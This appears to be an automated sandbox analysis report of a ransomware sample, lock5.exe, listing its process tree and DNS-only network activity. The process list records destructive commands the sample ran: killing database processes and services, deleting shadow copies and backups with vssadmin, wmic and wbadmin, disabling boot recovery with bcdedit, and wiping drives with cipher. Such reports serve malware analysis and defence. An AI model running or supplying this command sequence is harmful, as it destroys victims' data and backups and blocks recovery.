PID 2796 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\lock5.exe

"C:\Users\Admin\AppData\Local\Temp\lock5.exe"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlbrowser.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sql writer.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlserv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msmdsrv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im MsDtsSrvr.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlceip.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdlauncher.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im Ssms.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\taskkill.exe

taskkill -f -im SQLAGENT.EXE

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdhost.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im ReportingServicesService.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msftesql.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im pg_ctl.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\taskkill.exe

taskkill -f -impostgres.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\net.exe

net stop MSSQLServerADHelper100

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\net.exe

net stop MSSQL$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\net.exe

net stop MSSQL$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\net.exe

net stop SQLAgent$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\net.exe

net stop SQLAgent$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\net.exe

net stop SQLBrowser

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLBrowser

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\net.exe

net stop REportServer$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop REportServer$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\net.exe

net stop SQLWriter

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLWriter

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\wbadmin.exe

wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\wbadmin.exe

wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\lock5.exe

\\?\C:\Users\Admin\AppData\Local\Temp\lock5.exe -network

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pause

C:\Windows\SYSTEM32\cipher.exe

cipher /w:\\?\A:

C:\Windows\SYSTEM32\cipher.exe

cipher /w:\\?\C:

C:\Windows\SYSTEM32\cipher.exe

cipher /w:\\?\F:

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp

Files

N/A